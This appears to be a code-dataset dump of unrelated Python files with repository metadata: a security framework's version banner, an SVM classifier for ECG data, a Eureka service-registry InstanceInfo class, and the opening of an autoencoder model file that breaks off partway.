"MIT"
] | 86 | 2016-12-29T06:39:34.000Z | 2021-12-12T20:07:39.000Z | from core import colors
# Release metadata for the framework.
version = "pre-1.0"
apiversion = "pre-1.0"
update_date = "2021-07-11"
codename = "phoenix"
# Multi-line "about" banner assembled via string concatenation and
# implicit adjacent-literal joining.
about = ("Hakku Framework "+version+" "+codename+
"\nauthor: Noa-Emil Nissinen (4shadoww)"
"\nemail: 4shadoww0@gmail.com"
"\ngithub: 4shadoww")
| 21.75 | 49 | 0.701149 | from core import colors
# Release metadata for the framework.
version = "pre-1.0"
apiversion = "pre-1.0"
update_date = "2021-07-11"
codename = "phoenix"
# Multi-line "about" banner assembled via string concatenation and
# implicit adjacent-literal joining.
about = ("Hakku Framework "+version+" "+codename+
"\nauthor: Noa-Emil Nissinen (4shadoww)"
"\nemail: 4shadoww0@gmail.com"
"\ngithub: 4shadoww")
| 0 | 0 | 0 |
4d52a3963bb0f2212ae8fe3380222c58748b8ea3 | 2,799 | py | Python | models/SVM.py | yemx21/ECG | e6dd9bc6e9537e8773494b48814e4686bba98bea | [
"BSD-3-Clause"
] | null | null | null | models/SVM.py | yemx21/ECG | e6dd9bc6e9537e8773494b48814e4686bba98bea | [
"BSD-3-Clause"
] | null | null | null | models/SVM.py | yemx21/ECG | e6dd9bc6e9537e8773494b48814e4686bba98bea | [
"BSD-3-Clause"
] | null | null | null | # -*- coding:utf-8 -*-
import pandas as pd
import numpy as np
import math as math
import os
import time
from sklearn.svm import SVC
from models.cpuutils import *
from sklearn.externals import joblib
import tensorflow as tf
import time
| 35.43038 | 183 | 0.64273 | # -*- coding:utf-8 -*-
import pandas as pd
import numpy as np
import math as math
import os
import time
from sklearn.svm import SVC
from models.cpuutils import *
from sklearn.externals import joblib
import tensorflow as tf
import time
def run_SVM(timesteps, numclasses, train_x, train_y, train_lens, valid_x, valid_y, valid_lens, test_x, test_y, test_lens, modeldir, batchsize, maxepochs, patience, expsnum, **kwargs):
    """Train (or reload cached) SVM classifiers for `expsnum` experiments and log pooled test metrics.

    One sklearn SVC is fitted per experiment; each fitted model is cached as a
    .pkl under `modeldir`, so reruns load instead of retraining.  Predictions
    from all experiments are pooled before being passed to `savemetrics`.

    NOTE(review): timesteps, train_lens, valid_x/valid_y/valid_lens, batchsize,
    maxepochs and patience are never read here — presumably kept for signature
    parity with the neural-network runners; confirm against the callers.

    kwargs:
        svm_kernel: SVC kernel name; falls back to 'linear' when None.
    """
    tests_y = []
    preds_y = []
    epoches = []
    # Inverse-frequency class weights to counter class imbalance.
    # NOTE(review): divides by zero if a class index is absent from train_y.
    class_weights = {}
    for c in range(numclasses):
        class_weights.update({c:len(train_y) / float(np.count_nonzero(train_y == c))})
    arg_svm_kernel = kwargs['svm_kernel']
    svmkernel = 'linear' if arg_svm_kernel is None else arg_svm_kernel
    print(svmkernel)
    for exp in range(expsnum):
        print('exp ', str(exp), ': SVM...')
        modelfile = modeldir + str(exp) + '_' + svmkernel + '.pkl'
        # Train only when no cached model exists for this experiment/kernel pair.
        if not os.path.exists(modelfile):
            clf = SVC(random_state=int(time.time()), kernel=svmkernel, verbose=True, cache_size=400, class_weight=class_weights, max_iter=500000)
            clf.fit(train_x, train_y)
            joblib.dump(clf, modelfile)
        else:
            clf = joblib.load(modelfile)
        pred_y = clf.predict(test_x)
        tests_y.extend(test_y)
        preds_y.extend(pred_y)
        # SVMs have no training epochs; 30 is a hard-coded placeholder —
        # presumably to keep the savemetrics log format uniform; verify.
        epoches.append(30)
        print('exp', exp, np.mean(test_y == pred_y))
    # Pool labels/predictions from all experiments into flat 1-D vectors.
    test_yo= np.reshape(tests_y, [-1])
    pred_yo= np.reshape(preds_y, [-1])
    target_names = ['Class 1', 'Class 2', 'Class 3', 'Class 4', 'Class 5']
    logfile = modeldir + "svm.log"
    savemetrics(logfile, epoches, test_yo, pred_yo, target_names)
def test_SVM(timesteps, numclasses, test_x, test_y, test_lens, modeldir, batchsize, expsnum, **kwargs):
    """Benchmark previously trained SVM models: accuracy, model size and per-sample latency.

    Loads the cached .pkl model for each experiment (must have been produced by
    run_SVM), predicts the test set, and writes pooled results plus parameter
    counts and per-sample prediction times (ms) via `savebenchmark`.

    NOTE(review): timesteps, numclasses, test_lens and batchsize are unused —
    presumably kept for signature parity with other model runners.

    kwargs:
        svm_kernel: SVC kernel name used in the cached filename; 'linear' when None.
    """
    tests_y = []
    preds_y = []
    paramnums = []
    durations = []
    arg_svm_kernel = kwargs['svm_kernel']
    svmkernel = 'linear' if arg_svm_kernel is None else arg_svm_kernel
    for exp in range(expsnum):
        print('exp ', str(exp), ': SVM...')
        modelfile = modeldir + str(exp) + '_' + svmkernel + '.pkl'
        clf = joblib.load(modelfile)
        # Model "size" proxy: total number of support-vector coefficients.
        paramnum = clf.support_vectors_.size
        start_time = time.time()
        pred_y = clf.predict(test_x)
        # Average prediction latency per test sample, in milliseconds.
        duration = (time.time() - start_time) * 1000.0/ float(np.shape(test_x)[0])
        tests_y.extend(test_y)
        preds_y.extend(pred_y)
        print('exp', exp, np.mean(test_y == pred_y))
        paramnums.append(paramnum)
        durations.append(duration)
    # Pool labels/predictions from all experiments into flat 1-D vectors.
    test_yo= np.reshape(tests_y, [-1])
    pred_yo= np.reshape(preds_y, [-1])
    target_names = ['Class 1', 'Class 2', 'Class 3', 'Class 4', 'Class 5']
    logfile = modeldir + "svm_"+ svmkernel + ".benchmark"
    savebenchmark(logfile, paramnums, durations, test_yo, pred_yo, target_names)
| 2,517 | 0 | 46 |
9b0f8b9b426633ca2735e7cbe8a47041f7b6508c | 13,314 | py | Python | eureka/client/app_info/instance_info.py | haribo0915/Spring-Cloud-in-Python | 0bcd7093869c797df14428bf2d1b0a779f96e573 | [
"Apache-2.0"
] | 5 | 2020-10-06T09:48:23.000Z | 2020-10-07T13:19:46.000Z | eureka/client/app_info/instance_info.py | haribo0915/Spring-Cloud-in-Python | 0bcd7093869c797df14428bf2d1b0a779f96e573 | [
"Apache-2.0"
] | 5 | 2020-10-05T09:57:01.000Z | 2020-10-12T19:52:48.000Z | eureka/client/app_info/instance_info.py | haribo0915/Spring-Cloud-in-Python | 0bcd7093869c797df14428bf2d1b0a779f96e573 | [
"Apache-2.0"
] | 8 | 2020-10-05T06:34:49.000Z | 2020-10-07T13:19:46.000Z | # -*- coding: utf-8 -*-
# standard library
from enum import Enum
from typing import Dict, Optional
# scip plugin
from eureka.client.app_info.lease_info import LeaseInfo
from eureka.utils.timestamp import current_timestamp
__author__ = "Haribo (haribo1558599@gmail.com)"
__license__ = "Apache 2.0"
class InstanceInfo:
"""
The class that holds information required for registration with
Eureka Server and to be discovered by other components.
See com.netflix.appinfo.InstanceInfo.
"""
__slots__ = (
"_instance_id",
"_app_name",
"_app_group_name",
"_ip_address",
"_vip_address",
"_secure_vip_address",
"_lease_info",
"_metadata",
"_last_updated_timestamp",
"_last_dirty_timestamp",
"_action_type",
"_host_name",
"_is_coordinating_discovery_server",
"_is_secure_port_enabled",
"_is_unsecure_port_enabled",
"_port",
"_secure_port",
"_status",
"_overridden_status",
"_is_instance_info_dirty",
)
DEFAULT_PORT = 7001
DEFAULT_SECURE_PORT = 7002
class ActionType(Enum):
"""
Eureka server will set the action type on the instance to let
Eureka client know what action to perform on this instance in
its local registry.
"""
ADD = "ADD"
MODIFIED = "MODIFIED"
DELETED = "DELETED"
def __init__(
self,
instance_id: str,
app_name: str,
ip_address: str,
vip_address: str,
secure_vip_address: str,
lease_info: LeaseInfo,
host_name: str,
app_group_name: str = None,
metadata: Dict[str, str] = None,
last_updated_timestamp: int = None,
last_dirty_timestamp: int = None,
action_type: ActionType = None,
is_coordinating_discovery_server: bool = False,
is_secure_port_enabled: bool = False,
is_unsecure_port_enabled: bool = True,
port: int = DEFAULT_PORT,
secure_port: int = DEFAULT_SECURE_PORT,
status: Status = Status.UP,
overridden_status: Status = Status.UNKNOWN,
is_instance_info_dirty: bool = False,
):
"""
Args:
instance_id: the unique id of the instance.
app_name: the application name of the instance.This is mostly used in querying of instances.
ip_address: the ip address, in AWS scenario it is a private IP.
vip_address: the Virtual Internet Protocol address for this instance. Defaults to hostname if not specified.
secure_vip_address: the Secure Virtual Internet Protocol address for this instance. Defaults to hostname if not specified.
lease_info: the lease information regarding when it expires.
host_name: the default network address to connect to this instance. Typically this would be the fully qualified public hostname.
metadata: all application specific metadata set on the instance.
last_updated_timestamp: last time when the instance was updated.
last_dirty_timestamp: the last time when this instance was touched.
port: the unsecure port number that is used for servicing requests.
secure_port: the secure port that is used for servicing requests.
status: the status indicating whether the instance can handle requests.
overridden_status:the status indicating whether an external process has changed the status.
"""
self._instance_id = instance_id
self._app_name = app_name
self._app_group_name = app_group_name
self._ip_address = ip_address
self._vip_address = vip_address
self._secure_vip_address = secure_vip_address
self._lease_info = lease_info
self._metadata = metadata
self._last_updated_timestamp = last_updated_timestamp
self._last_dirty_timestamp = last_dirty_timestamp
self._action_type = action_type
self._host_name = host_name
self._is_coordinating_discovery_server = is_coordinating_discovery_server
self._is_secure_port_enabled = is_secure_port_enabled
self._is_unsecure_port_enabled = is_unsecure_port_enabled
self._port = port
self._secure_port = secure_port
self._status = status
self._overridden_status = overridden_status
self._is_instance_info_dirty = is_instance_info_dirty
@property
@instance_id.setter
@property
@app_name.setter
@property
@app_group_name.setter
@property
@ip_address.setter
@property
@vip_address.setter
@property
@secure_vip_address.setter
@property
@lease_info.setter
@property
@metadata.setter
@property
@last_updated_timestamp.setter
@property
@last_dirty_timestamp.setter
@property
@port.setter
@property
@secure_port.setter
@property
@action_type.setter
@property
@host_name.setter
@property
@is_secure_port_enabled.setter
@property
@is_unsecure_port_enabled.setter
@property
@status.setter
@property
@overridden_status.setter
@property
@is_instance_info_dirty.setter
@property
@is_coordinating_discovery_server.setter
def is_port_enabled(self, port_type: PortType) -> bool:
"""
Checks whether a port is enabled for traffic or not.
Args:
port_type: indicates whether it is secure or unsecure port.
Returns: true if the port is enabled, false otherwise.
"""
return {
InstanceInfo.PortType.UNSECURE: self._is_unsecure_port_enabled,
InstanceInfo.PortType.SECURE: self._is_secure_port_enabled,
}.get(port_type, False)
def is_dirty(self) -> bool:
"""
Return whether any state changed so that EurekaClient can
check whether to retransmit info or not on the next heartbeat.
Returns: true if the instance is dirty, false otherwise.
"""
return self._is_instance_info_dirty
def set_is_dirty(self):
"""
Set the dirty flag so that the instance information can be carried to
the eureka server on the next heartbeat.
"""
self._is_instance_info_dirty = True
self._last_dirty_timestamp = current_timestamp()
def set_is_dirty_with_time(self) -> int:
"""
Set the dirty flag, and also return the timestamp of the is_dirty event.
Returns: the timestamp when the isDirty flag is set.
"""
self.set_is_dirty()
return self._last_dirty_timestamp
def unset_is_dirty(self, unset_dirty_timestamp: int):
"""
Unset the dirty flag iff the unset_dirty_timestamp matches the last_dirty_timestamp. No-op if
last_dirty_timestamp > unset_dirty_timestamp
Args:
unset_dirty_timestamp: the expected last_dirty_timestamp to unset.
"""
if self._last_dirty_timestamp <= unset_dirty_timestamp:
self._is_instance_info_dirty = False
def set_is_coordinating_discovery_server(self):
"""
Set the flag if this instance is the same as the eureka discovery server that is
return the instances. This flag is used by the discovery clients to
identify the discovery server which is coordinating/returning the
information.
"""
self._is_coordinating_discovery_server = True
def set_status(self, status: Status) -> Optional[Status]:
"""
Set the status for this instance.
Args:
status: status to be set for this instance.
Returns: the previous status if a different status from the current was set, none otherwise.
"""
if self._status != status:
previous_status = self._status
self._status = status
self.set_is_dirty()
return previous_status
return None
def set_status_without_dirty(self, status: Status):
"""
Set the status for this instance without updating the dirty timestamp.
Args:
status: status to be set for this instance.
"""
if self._status != status:
self._status = status
def set_overridden_status(self, status: Status):
"""
Set the overridden status for this instance. Normally set by an external
process to disable instance from taking traffic.
Args:
status: overridden status to be for this instance.
"""
if self._overridden_status != status:
self._overridden_status = status
def register_runtime_metadata(self, metadata: Dict[str, str]):
"""
Register application specific metadata to be sent to the eureka
server.
Args:
metadata: Dictionary containing key/value pairs.
"""
self._metadata.update(metadata)
self.set_is_dirty()
| 33.368421 | 140 | 0.670647 | # -*- coding: utf-8 -*-
# standard library
from enum import Enum
from typing import Dict, Optional
# scip plugin
from eureka.client.app_info.lease_info import LeaseInfo
from eureka.utils.timestamp import current_timestamp
__author__ = "Haribo (haribo1558599@gmail.com)"
__license__ = "Apache 2.0"
class InstanceInfo:
    """
    The class that holds information required for registration with
    Eureka Server and to be discovered by other components.
    See com.netflix.appinfo.InstanceInfo.
    """
    # __slots__ keeps per-instance memory low and forbids ad-hoc attributes.
    __slots__ = (
        "_instance_id",
        "_app_name",
        "_app_group_name",
        "_ip_address",
        "_vip_address",
        "_secure_vip_address",
        "_lease_info",
        "_metadata",
        "_last_updated_timestamp",
        "_last_dirty_timestamp",
        "_action_type",
        "_host_name",
        "_is_coordinating_discovery_server",
        "_is_secure_port_enabled",
        "_is_unsecure_port_enabled",
        "_port",
        "_secure_port",
        "_status",
        "_overridden_status",
        "_is_instance_info_dirty",
    )
    DEFAULT_PORT = 7001
    DEFAULT_SECURE_PORT = 7002
    # Which of the two service ports a query refers to.
    class PortType(Enum):
        SECURE = "SECURE"
        UNSECURE = "UNSECURE"
    # Lifecycle status of the instance as reported to/by the Eureka server.
    class Status(Enum):
        # Ready to receive traffic.
        UP = "UP"
        # Do not send traffic (Healthcheck callback failed).
        DOWN = "DOWN"
        # Do not send traffic (Just about starting and initializations are to be done).
        STARTING = "STARTING"
        # Intentionally shutdown for traffic.
        OUT_OF_SERVICE = "OUT_OF_SERVICE"
        UNKNOWN = "UNKNOWN"
    class ActionType(Enum):
        """
        Eureka server will set the action type on the instance to let
        Eureka client know what action to perform on this instance in
        its local registry.
        """
        ADD = "ADD"
        MODIFIED = "MODIFIED"
        DELETED = "DELETED"
    def __init__(
        self,
        instance_id: str,
        app_name: str,
        ip_address: str,
        vip_address: str,
        secure_vip_address: str,
        lease_info: LeaseInfo,
        host_name: str,
        app_group_name: str = None,
        metadata: Dict[str, str] = None,
        last_updated_timestamp: int = None,
        last_dirty_timestamp: int = None,
        action_type: ActionType = None,
        is_coordinating_discovery_server: bool = False,
        is_secure_port_enabled: bool = False,
        is_unsecure_port_enabled: bool = True,
        port: int = DEFAULT_PORT,
        secure_port: int = DEFAULT_SECURE_PORT,
        status: Status = Status.UP,
        overridden_status: Status = Status.UNKNOWN,
        is_instance_info_dirty: bool = False,
    ):
        """
        Args:
            instance_id: the unique id of the instance.
            app_name: the application name of the instance.This is mostly used in querying of instances.
            ip_address: the ip address, in AWS scenario it is a private IP.
            vip_address: the Virtual Internet Protocol address for this instance. Defaults to hostname if not specified.
            secure_vip_address: the Secure Virtual Internet Protocol address for this instance. Defaults to hostname if not specified.
            lease_info: the lease information regarding when it expires.
            host_name: the default network address to connect to this instance. Typically this would be the fully qualified public hostname.
            metadata: all application specific metadata set on the instance.
            last_updated_timestamp: last time when the instance was updated.
            last_dirty_timestamp: the last time when this instance was touched.
            port: the unsecure port number that is used for servicing requests.
            secure_port: the secure port that is used for servicing requests.
            status: the status indicating whether the instance can handle requests.
            overridden_status:the status indicating whether an external process has changed the status.
        """
        self._instance_id = instance_id
        self._app_name = app_name
        self._app_group_name = app_group_name
        self._ip_address = ip_address
        self._vip_address = vip_address
        self._secure_vip_address = secure_vip_address
        self._lease_info = lease_info
        self._metadata = metadata
        self._last_updated_timestamp = last_updated_timestamp
        self._last_dirty_timestamp = last_dirty_timestamp
        self._action_type = action_type
        self._host_name = host_name
        self._is_coordinating_discovery_server = is_coordinating_discovery_server
        self._is_secure_port_enabled = is_secure_port_enabled
        self._is_unsecure_port_enabled = is_unsecure_port_enabled
        self._port = port
        self._secure_port = secure_port
        self._status = status
        self._overridden_status = overridden_status
        self._is_instance_info_dirty = is_instance_info_dirty
    # ------------------------------------------------------------------
    # Plain property accessors: one getter/setter pair per slotted field.
    # NOTE: these setters do NOT mark the instance dirty; use the set_*
    # methods below when the change must be replicated to the server.
    # ------------------------------------------------------------------
    @property
    def instance_id(self) -> str:
        return self._instance_id
    @instance_id.setter
    def instance_id(self, instance_id: str):
        self._instance_id = instance_id
    @property
    def app_name(self) -> str:
        return self._app_name
    @app_name.setter
    def app_name(self, app_name: str):
        self._app_name = app_name
    @property
    def app_group_name(self) -> str:
        return self._app_group_name
    @app_group_name.setter
    def app_group_name(self, app_group_name: str):
        self._app_group_name = app_group_name
    @property
    def ip_address(self) -> str:
        return self._ip_address
    @ip_address.setter
    def ip_address(self, ip_address: str):
        self._ip_address = ip_address
    @property
    def vip_address(self) -> str:
        return self._vip_address
    @vip_address.setter
    def vip_address(self, vip_address: str):
        self._vip_address = vip_address
    @property
    def secure_vip_address(self) -> str:
        return self._secure_vip_address
    @secure_vip_address.setter
    def secure_vip_address(self, secure_vip_address: str):
        self._secure_vip_address = secure_vip_address
    @property
    def lease_info(self) -> LeaseInfo:
        return self._lease_info
    @lease_info.setter
    def lease_info(self, lease_info: LeaseInfo):
        self._lease_info = lease_info
    @property
    def metadata(self) -> Dict[str, str]:
        return self._metadata
    @metadata.setter
    def metadata(self, metadata: Dict[str, str]):
        self._metadata = metadata
    @property
    def last_updated_timestamp(self) -> int:
        return self._last_updated_timestamp
    @last_updated_timestamp.setter
    def last_updated_timestamp(self, last_updated_timestamp: int):
        self._last_updated_timestamp = last_updated_timestamp
    @property
    def last_dirty_timestamp(self) -> int:
        return self._last_dirty_timestamp
    @last_dirty_timestamp.setter
    def last_dirty_timestamp(self, last_dirty_timestamp: int):
        self._last_dirty_timestamp = last_dirty_timestamp
    @property
    def port(self) -> int:
        return self._port
    @port.setter
    def port(self, port: int):
        self._port = port
    @property
    def secure_port(self) -> int:
        return self._secure_port
    @secure_port.setter
    def secure_port(self, secure_port: int):
        self._secure_port = secure_port
    @property
    def action_type(self) -> ActionType:
        return self._action_type
    @action_type.setter
    def action_type(self, action_type: ActionType):
        self._action_type = action_type
    @property
    def host_name(self) -> str:
        return self._host_name
    @host_name.setter
    def host_name(self, host_name: str):
        self._host_name = host_name
    @property
    def is_secure_port_enabled(self) -> bool:
        return self._is_secure_port_enabled
    @is_secure_port_enabled.setter
    def is_secure_port_enabled(self, is_secure_port_enabled: bool):
        self._is_secure_port_enabled = is_secure_port_enabled
    @property
    def is_unsecure_port_enabled(self) -> bool:
        return self._is_unsecure_port_enabled
    @is_unsecure_port_enabled.setter
    def is_unsecure_port_enabled(self, is_unsecure_port_enabled: bool):
        self._is_unsecure_port_enabled = is_unsecure_port_enabled
    @property
    def status(self) -> Status:
        return self._status
    @status.setter
    def status(self, status: Status):
        self._status = status
    @property
    def overridden_status(self) -> Status:
        return self._overridden_status
    @overridden_status.setter
    def overridden_status(self, overridden_status: Status):
        self._overridden_status = overridden_status
    @property
    def is_instance_info_dirty(self) -> bool:
        return self._is_instance_info_dirty
    @is_instance_info_dirty.setter
    def is_instance_info_dirty(self, is_instance_info_dirty: bool):
        self._is_instance_info_dirty = is_instance_info_dirty
    @property
    def is_coordinating_discovery_server(self) -> bool:
        return self._is_coordinating_discovery_server
    @is_coordinating_discovery_server.setter
    def is_coordinating_discovery_server(self, is_coordinating_discovery_server: bool):
        self._is_coordinating_discovery_server = is_coordinating_discovery_server
    # ------------------------------------------------------------------
    # Behavioral methods (these maintain the dirty flag / timestamps).
    # ------------------------------------------------------------------
    def is_port_enabled(self, port_type: PortType) -> bool:
        """
        Checks whether a port is enabled for traffic or not.
        Args:
            port_type: indicates whether it is secure or unsecure port.
        Returns: true if the port is enabled, false otherwise.
        """
        return {
            InstanceInfo.PortType.UNSECURE: self._is_unsecure_port_enabled,
            InstanceInfo.PortType.SECURE: self._is_secure_port_enabled,
        }.get(port_type, False)
    def is_dirty(self) -> bool:
        """
        Return whether any state changed so that EurekaClient can
        check whether to retransmit info or not on the next heartbeat.
        Returns: true if the instance is dirty, false otherwise.
        """
        return self._is_instance_info_dirty
    def is_dirty_with_time(self) -> Optional[int]:
        # The dirty timestamp when the instance is dirty, otherwise None.
        return self._last_dirty_timestamp if self._is_instance_info_dirty else None
    def set_is_dirty(self):
        """
        Set the dirty flag so that the instance information can be carried to
        the eureka server on the next heartbeat.
        """
        self._is_instance_info_dirty = True
        self._last_dirty_timestamp = current_timestamp()
    def set_is_dirty_with_time(self) -> int:
        """
        Set the dirty flag, and also return the timestamp of the is_dirty event.
        Returns: the timestamp when the isDirty flag is set.
        """
        self.set_is_dirty()
        return self._last_dirty_timestamp
    def unset_is_dirty(self, unset_dirty_timestamp: int):
        """
        Unset the dirty flag iff the unset_dirty_timestamp matches the last_dirty_timestamp. No-op if
        last_dirty_timestamp > unset_dirty_timestamp
        Args:
            unset_dirty_timestamp: the expected last_dirty_timestamp to unset.
        """
        if self._last_dirty_timestamp <= unset_dirty_timestamp:
            self._is_instance_info_dirty = False
    def set_last_updated_timestamp(self):
        # Refresh the last-updated marker to the current time.
        self._last_updated_timestamp = current_timestamp()
    def set_is_coordinating_discovery_server(self):
        """
        Set the flag if this instance is the same as the eureka discovery server that is
        return the instances. This flag is used by the discovery clients to
        identify the discovery server which is coordinating/returning the
        information.
        """
        self._is_coordinating_discovery_server = True
    def set_status(self, status: Status) -> Optional[Status]:
        """
        Set the status for this instance.
        Args:
            status: status to be set for this instance.
        Returns: the previous status if a different status from the current was set, none otherwise.
        """
        if self._status != status:
            previous_status = self._status
            self._status = status
            self.set_is_dirty()
            return previous_status
        return None
    def set_status_without_dirty(self, status: Status):
        """
        Set the status for this instance without updating the dirty timestamp.
        Args:
            status: status to be set for this instance.
        """
        if self._status != status:
            self._status = status
    def set_overridden_status(self, status: Status):
        """
        Set the overridden status for this instance. Normally set by an external
        process to disable instance from taking traffic.
        Args:
            status: overridden status to be for this instance.
        """
        if self._overridden_status != status:
            self._overridden_status = status
    def register_runtime_metadata(self, metadata: Dict[str, str]):
        """
        Register application specific metadata to be sent to the eureka
        server.
        Args:
            metadata: Dictionary containing key/value pairs.
        """
        self._metadata.update(metadata)
        self.set_is_dirty()
| 2,672 | 426 | 1,148 |
d2d90ca6f48ea2a81de8048d173854525c05722d | 10,723 | py | Python | iin/models/ae.py | KongBOy/analyze_16_code_iin | b1bcf6055f95680fa101f8f3e34766801f506289 | [
"MIT"
] | 94 | 2020-04-02T18:10:27.000Z | 2022-03-16T08:36:37.000Z | iin/models/ae.py | KongBOy/analyze_16_code_iin | b1bcf6055f95680fa101f8f3e34766801f506289 | [
"MIT"
] | 6 | 2020-06-23T03:29:20.000Z | 2021-04-22T07:44:07.000Z | iin/models/ae.py | CompVis/iin | fa0d2d1cfa6fc0b813b902cd3474145a045fbb34 | [
"MIT"
] | 15 | 2020-04-29T02:49:36.000Z | 2022-02-22T04:32:06.000Z | import functools
import torch.nn as nn
import torch
import numpy as np
from edflow.util import retrieve
_norm_options = {
"in": nn.InstanceNorm2d,
"bn": nn.BatchNorm2d,
"an": ActNorm}
| 31.538235 | 87 | 0.546396 | import functools
import torch.nn as nn
import torch
import numpy as np
from edflow.util import retrieve
class ActNorm(nn.Module):
    """Activation normalization: per-channel affine y = scale * (x + loc).

    `loc` and `scale` are data-dependently initialized from the first batch
    seen so that outputs are standardized per channel; afterwards they are
    trained as ordinary parameters.  With logdet=True, forward also returns
    the log-determinant of the transform (per batch element).
    """
    def __init__(self, num_features, affine=True, logdet=False):
        super().__init__()
        assert affine
        self.logdet = logdet
        self.loc = nn.Parameter(torch.zeros(1, num_features, 1, 1))
        self.scale = nn.Parameter(torch.ones(1, num_features, 1, 1))
        # 0/1 flag stored as a buffer so "already initialized" persists in checkpoints.
        self.register_buffer('initialized', torch.tensor(0, dtype=torch.uint8))
    def initialize(self, input):
        # Data-dependent init: choose loc/scale so that this batch's activations
        # have zero mean and unit variance per channel (1e-6 guards zero std).
        with torch.no_grad():
            # Collapse (N, C, H, W) -> (C, N*H*W): statistics per channel.
            flatten = input.permute(1, 0, 2, 3).contiguous().view(input.shape[1], -1)
            mean = (
                flatten.mean(1)
                .unsqueeze(1)
                .unsqueeze(2)
                .unsqueeze(3)
                .permute(1, 0, 2, 3)
            )
            std = (
                flatten.std(1)
                .unsqueeze(1)
                .unsqueeze(2)
                .unsqueeze(3)
                .permute(1, 0, 2, 3)
            )
            self.loc.data.copy_(-mean)
            self.scale.data.copy_(1 / (std + 1e-6))
    def forward(self, input, reverse=False):
        if reverse:
            return self.reverse(input)
        _, _, height, width = input.shape
        # Lazy one-time init from the first forward batch.
        if self.initialized.item() == 0:
            self.initialize(input)
            self.initialized.fill_(1)
        h = self.scale * (input + self.loc)
        if self.logdet:
            # log|det J| = H * W * sum_c log|scale_c|, broadcast over the batch.
            log_abs = torch.log(torch.abs(self.scale))
            logdet = height*width*torch.sum(log_abs)
            logdet = logdet * torch.ones(input.shape[0]).to(input)
            return h, logdet
        return h
    def reverse(self, output):
        # Exact inverse of the forward affine map.
        return output / self.scale - self.loc
# Normalization layers selectable by the `norm` config string (lower-cased key).
_norm_options = {
    "in": nn.InstanceNorm2d,
    "bn": nn.BatchNorm2d,
    "an": ActNorm}
def weights_init(m):
    """Initialize Conv/BatchNorm modules in place: weights ~ N(0, 0.02) for
    conv layers, weights ~ N(1, 0.02) and zero bias for batch-norm layers.
    Intended for use with ``module.apply(weights_init)``; other module types
    are left untouched.
    """
    name = m.__class__.__name__
    if 'Conv' in name:
        nn.init.normal_(m.weight.data, 0.0, 0.02)
    elif 'BatchNorm' in name:
        nn.init.normal_(m.weight.data, 1.0, 0.02)
        nn.init.constant_(m.bias.data, 0)
class FeatureLayer(nn.Module):
    """One encoder downsampling stage: stride-2 4x4 conv -> norm -> LeakyReLU.

    Channel count follows 64 * min(2**scale, 16): it doubles each stage and
    is capped at 1024.  When `in_channels` is None it is inferred from the
    previous stage's output using the same formula at scale-1.
    """
    def __init__(self, scale, in_channels=None, norm='IN'):
        super().__init__()
        self.scale = scale
        # Resolve the norm layer class from the module-level registry.
        self.norm = _norm_options[norm.lower()]
        if in_channels is None:
            self.in_channels = 64*min(2**(self.scale-1), 16)
        else:
            self.in_channels = in_channels
        self.build()
    def forward(self, input):
        x = input
        for layer in self.sub_layers:
            x = layer(x)
        return x
    def build(self):
        Norm = functools.partial(self.norm, affine=True)
        Activate = lambda: nn.LeakyReLU(0.2)
        self.sub_layers = nn.ModuleList([
            nn.Conv2d(
                in_channels=self.in_channels,
                out_channels=64*min(2**self.scale, 16),
                kernel_size=4,
                stride=2,
                padding=1,
                bias=False),
            Norm(num_features=64*min(2**self.scale, 16)),
            Activate()])
class LatentLayer(nn.Module):
    """A 1x1 convolution mapping `in_channels` to `out_channels`; spatial
    dimensions are unchanged."""
    def __init__(self, in_channels, out_channels):
        super(LatentLayer, self).__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.build()
    def forward(self, input):
        h = input
        for module in self.sub_layers:
            h = module(h)
        return h
    def build(self):
        # Single pointwise conv wrapped in a ModuleList for uniformity with
        # the other layer classes in this file.
        projection = nn.Conv2d(
            in_channels=self.in_channels,
            out_channels=self.out_channels,
            kernel_size=1,
            stride=1,
            padding=0,
            bias=True)
        self.sub_layers = nn.ModuleList([projection])
class DecoderLayer(nn.Module):
    """One decoder upsampling stage: stride-2 4x4 transposed conv -> norm -> LeakyReLU.

    Mirrors FeatureLayer: output channels are 64 * min(2**scale, 16); when
    `in_channels` is None it defaults to the next-larger stage's channel count.
    """
    def __init__(self, scale, in_channels=None, norm='IN'):
        super().__init__()
        self.scale = scale
        # Resolve the norm layer class from the module-level registry.
        self.norm = _norm_options[norm.lower()]
        if in_channels is not None:
            self.in_channels = in_channels
        else:
            self.in_channels = 64*min(2**(self.scale+1), 16)
        self.build()
    def forward(self, input):
        d = input
        for layer in self.sub_layers:
            d = layer(d)
        return d
    def build(self):
        Norm = functools.partial(self.norm, affine=True)
        Activate = lambda: nn.LeakyReLU(0.2)
        self.sub_layers = nn.ModuleList([
            nn.ConvTranspose2d(
                in_channels=self.in_channels,
                out_channels=64*min(2**self.scale, 16),
                kernel_size=4,
                stride=2,
                padding=1,
                bias=False),
            Norm(num_features=64*min(2**self.scale, 16)),
            Activate()])
class DenseEncoderLayer(nn.Module):
    """Final encoder projection: a conv whose kernel equals the feature map's
    spatial size, collapsing an (N, C, s, s) map to (N, out_size, 1, 1).
    Acts like a fully connected layer expressed as a convolution.
    """
    def __init__(self, scale, spatial_size, out_size, in_channels=None):
        super().__init__()
        self.scale = scale
        self.in_channels = 64*min(2**(self.scale-1), 16)
        # Explicit in_channels overrides the scale-derived default.
        if in_channels is not None:
            self.in_channels = in_channels
        self.out_channels = out_size
        self.kernel_size = spatial_size
        self.build()
    def forward(self, input):
        x = input
        for layer in self.sub_layers:
            x = layer(x)
        return x
    def build(self):
        self.sub_layers = nn.ModuleList([
            nn.Conv2d(
                in_channels=self.in_channels,
                out_channels=self.out_channels,
                kernel_size=self.kernel_size,
                stride=1,
                padding=0,
                bias=True)])
class DenseDecoderLayer(nn.Module):
    """Inverse of DenseEncoderLayer: a transposed conv expanding an
    (N, in_size, 1, 1) latent to an (N, 64*min(2**scale, 16), s, s) map.
    """
    def __init__(self, scale, spatial_size, in_size):
        super().__init__()
        self.scale = scale
        self.in_channels = in_size
        self.out_channels = 64*min(2**self.scale, 16)
        self.kernel_size = spatial_size
        self.build()
    def forward(self, input):
        x = input
        for layer in self.sub_layers:
            x = layer(x)
        return x
    def build(self):
        self.sub_layers = nn.ModuleList([
            nn.ConvTranspose2d(
                in_channels=self.in_channels,
                out_channels=self.out_channels,
                kernel_size=self.kernel_size,
                stride=1,
                padding=0,
                bias=True)])
class ImageLayer(nn.Module):
    """Final output stage: stride-2 4x4 transposed conv (last 2x upsample)
    followed by tanh, mapping features to an image in [-1, 1].
    """
    def __init__(self, out_channels=3, in_channels=64):
        super().__init__()
